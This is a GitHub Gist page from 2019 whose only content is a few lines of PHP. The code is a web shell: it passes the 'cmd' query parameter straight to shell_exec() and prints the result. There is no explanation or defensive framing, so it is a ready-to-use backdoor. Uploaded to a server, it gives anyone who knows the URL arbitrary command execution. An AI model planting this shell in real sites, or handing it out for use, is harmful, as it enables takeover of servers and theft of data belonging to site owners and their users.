Skip to content

Instantly share code, notes, and snippets.

@hddananjaya
Created April 4, 2019 10:53
Show Gist options
  • Save hddananjaya/4033199203beabb65a93e33cbc2d5ae3 to your computer and use it in GitHub Desktop.
Save hddananjaya/4033199203beabb65a93e33cbc2d5ae3 to your computer and use it in GitHub Desktop.
<!-- PHP shell_exec() -->
<?php
if (isset($_GET["cmd"])){
$out=shell_exec($_GET["cmd"]);
echo($out);
}
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment